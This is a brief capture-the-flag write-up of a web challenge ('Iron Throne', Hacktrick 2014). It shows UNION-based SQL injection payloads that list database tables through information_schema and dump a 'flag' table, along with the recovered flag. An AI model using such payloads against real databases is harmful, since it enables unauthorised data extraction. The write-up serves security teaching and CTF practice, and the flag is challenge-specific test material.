Hacktrick 2014 - Iron Throne - Web Write-up

This challenge was about SQLi, system was searching the input we gave by using a statement like this:

select * from X where Y like 'input%'

so we first used an input like this to gather the table names:

asdf' union select table_name, 2 from information_schema.tables where '1'='1' or 'a'='

which end up with a query as:

select * from X where Y like 'asdf' union select table_name, 2 from information_schema.tables where '1'='1' or 'a'='%'

and what we get was:

flag         2
news 2

so we pulled from the table named flag like this:

asdf' union select *, 2 from flag where '1'='1' or 'a'='
select * from X where Y like 'asdf' union select *, 2 from flag where '1'='1' or 'a'=' %'

and voila:
Is@1dTh@tWAFisUs3l3ss4us